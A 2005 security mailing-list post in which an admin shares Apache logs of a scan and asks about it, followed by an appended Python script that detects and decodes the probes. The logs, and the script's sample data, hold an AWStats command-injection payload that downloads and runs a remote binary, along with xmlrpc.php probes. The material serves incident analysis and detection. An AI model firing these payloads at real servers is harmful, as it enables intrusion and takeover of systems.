Hi
Recently I've been getting a bigger than normal amount of port 80
designated attacks. What's strange is that most of these look much
alike, like it was some kind of script/program for scanning. Is anybody
else getting those? What is it?
Below are the logs from apache:
81.208.19.149 - - [22/Nov/2005:22:10:31 +0100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 317
81.208.19.149 - - [22/Nov/2005:22:10:32 +0100] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 317
81.208.19.149 - - [22/Nov/2005:22:10:36 +0100] "GET
/cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 325
81.208.19.149 - - [22/Nov/2005:22:10:37 +0100] "POST /xmlrpc.php
HTTP/1.1" 404 309
81.208.19.149 - - [22/Nov/2005:22:10:39 +0100] "POST /blog/xmlrpc.php
HTTP/1.1" 404 314
81.208.19.149 - - [22/Nov/2005:22:10:40 +0100] "POST
/blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 321
81.208.19.149 - - [22/Nov/2005:22:10:44 +0100] "POST
/blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 322
81.208.19.149 - - [22/Nov/2005:22:10:48 +0100] "POST /drupal/xmlrpc.php
HTTP/1.1" 404 316
81.208.19.149 - - [22/Nov/2005:22:10:50 +0100] "POST
/phpgroupware/xmlrpc.php HTTP/1.1" 404 322
81.208.19.149 - - [22/Nov/2005:22:10:54 +0100] "POST
/wordpress/xmlrpc.php HTTP/1.1" 404 319
81.208.19.149 - - [22/Nov/2005:22:10:56 +0100] "POST /xmlrpc.php
HTTP/1.1" 404 309
81.208.19.149 - - [22/Nov/2005:22:10:57 +0100] "POST /xmlrpc/xmlrpc.php
HTTP/1.1" 404 316
What exactly is this for? Looking for xmlrpc.php, is it some file
with a known exploit to it or such?
And furthermore, this here:
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
/cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
This is, as far as I can understand, a vulnerability that allows one to
execute shell commands with the privileges of the apache user. Nice..
--
Best wishes
Łukasz Hejnak
--
http://linuxfromscratch.org/mailman/listinfo/lfs-security
FAQ: http://www.linuxfromscratch.org/faq/
Unsubscribe: See the above information page
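Added example, not part of the original post or of anything the LFS list ships: a small Python script that reads Apache access-log lines in the common log format, flags the two patterns quoted above (an AWStats "configdir=|...|" command injection, and POST probes for xmlrpc.php under assorted blog and CMS directories), URL-decodes the injected shell command so an admin can read what the probe tried to run, and counts flagged requests per source address to surface the scanner behaviour the post describes. The sample log is constructed from the post's own lines rejoined onto single lines, plus one benign request from a made-up address (10.0.0.5) for contrast; the helper names (parse_line, classify, scan, likely_scanners) and the threshold of 3 are this example's own choices.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample input: a few of the access-log lines quoted in the post
# (rejoined onto single lines) plus one benign request from a made-up address.
SAMPLE_LOG = """\
81.208.19.149 - - [22/Nov/2005:22:10:31 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 317
81.208.19.149 - - [22/Nov/2005:22:10:37 +0100] "POST /xmlrpc.php HTTP/1.1" 404 309
81.208.19.149 - - [22/Nov/2005:22:10:39 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 314
81.208.19.149 - - [22/Nov/2005:22:10:48 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 316
10.0.0.5 - - [22/Nov/2005:22:11:02 +0100] "GET /index.html HTTP/1.1" 200 2048
"""

# Apache common log format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def awstats_injected_command(path):
    """If the request is an AWStats configdir injection (the value is wrapped in
    pipes so the CGI passes it to a shell), return the URL-decoded command text;
    otherwise return None."""
    decoded = unquote(path)
    if "awstats.pl" not in decoded:
        return None
    m = re.search(r"[?&]configdir=\|(.*)\|", decoded)
    return m.group(1) if m else None


def classify(entry):
    """Return the list of detection tags that apply to a parsed log entry."""
    tags = []
    if awstats_injected_command(entry["path"]) is not None:
        tags.append("awstats-configdir-injection")
    script = unquote(entry["path"]).split("?", 1)[0]
    if entry["method"] == "POST" and script.endswith("xmlrpc.php"):
        tags.append("xmlrpc-probe")
    return tags


def scan(log_text):
    """Return (hits, per_ip): every flagged request, and a count of flagged
    requests per source address. 'served' is False when the server answered
    with a 4xx/5xx, i.e. the probed file was not there (as in the post)."""
    hits = []
    per_ip = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            served = not entry["status"].startswith(("4", "5"))
            hits.append({**entry, "tags": tags, "served": served})
            per_ip[entry["ip"]] += 1
    return hits, per_ip


def likely_scanners(per_ip, threshold=3):
    """Addresses with at least `threshold` flagged requests: the pattern of many
    near-identical probes from one source within seconds. Threshold is a
    constructed default, tune it to your traffic."""
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


if __name__ == "__main__":
    hits, per_ip = scan(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["ts"], h["method"], h["tags"], "served" if h["served"] else "not served")
        cmd = awstats_injected_command(h["path"])
        if cmd is not None:
            print("  decoded injected command:", cmd)
    print("likely scanners:", likely_scanners(per_ip))
```

Run it against a real log with `scan(open("/var/log/apache/access_log").read())`; the thing to look at first is any hit where `served` is True, since a 404 (as in every line of the post) means the probed script was not present and the request did nothing.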